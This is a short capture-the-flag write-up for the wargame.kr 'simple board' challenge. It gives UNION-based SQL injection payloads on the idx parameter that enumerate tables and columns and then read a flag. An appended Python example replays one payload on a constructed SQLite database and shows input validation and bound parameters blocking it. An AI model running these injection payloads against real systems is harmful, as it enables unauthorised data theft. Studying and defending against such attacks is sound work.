[wargame.kr]simple board
shnec
2017. 2. 24. 15:23
UNION-based SQL injection on idx does the job,
but the cookie value has to be changed along with idx.
First query
5 union select table_name,2,3,4 from information_schema.tables where table_type='base table' limit 0,1#
Convert 'base table' to hex:
5%20union%20select%20table_name,2,3,4%20from%20information_schema.tables%20where%20table_type=0x62617365207461626c65%20limit%200,1#
-> table name: README
Second query
5 union select column_name,2,3,4 from information_schema.columns where table_name='README'#
5 union select column_name,2,3,4 from information_schema.columns where table_name=0x524541444d45#
-> column name: flag
Third query
5 union select 1,2,3,flag from README#
-> flag
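
From the defender's side, an added example (not part of the original post, and not the challenge's real code) showing why the third query works against an unquoted numeric idx and how integer validation plus a bound parameter stops it. It assumes a quote-escaping filter and a made-up `board` table, runs on SQLite instead of MySQL, and drops the trailing `#` because SQLite has no `#` comment; only `README` and `flag` are names from the write-up.

```python
import re
import sqlite3

QUERY = "SELECT idx, title, author, body FROM board WHERE idx="

def make_db():
    # Constructed sample data. The board schema is hypothetical.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE board (idx INTEGER, title TEXT, author TEXT, body TEXT);
        INSERT INTO board VALUES (1, 'hello', 'admin', 'first post');
        CREATE TABLE README (flag TEXT);
        INSERT INTO README VALUES ('FLAG{constructed-sample}');
    """)
    return db

def escape_quotes(value):
    # Assumed stand-in for a quote-escaping input filter.
    return value.replace("'", "''")

def read_vulnerable(db, idx):
    # idx is concatenated into a numeric context with no surrounding quotes,
    # so escaping quotes never constrains what the attacker can append.
    return db.execute(QUERY + escape_quotes(idx)).fetchall()

def read_hardened(db, idx):
    # Accept only a plain decimal integer, then pass it as a bound parameter
    # so it can never be parsed as SQL text.
    if not re.fullmatch(r"[0-9]{1,9}", idx):
        raise ValueError("idx must be a decimal integer")
    return db.execute(QUERY + "?", (int(idx),)).fetchall()

# Third query from the write-up, without the trailing '#'.
PAYLOAD = "5 union select 1,2,3,flag from README"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", read_vulnerable(db, PAYLOAD))
    try:
        read_hardened(db, PAYLOAD)
    except ValueError as exc:
        print("hardened rejected input:", exc)
    print("hardened, valid idx:", read_hardened(db, "1"))
```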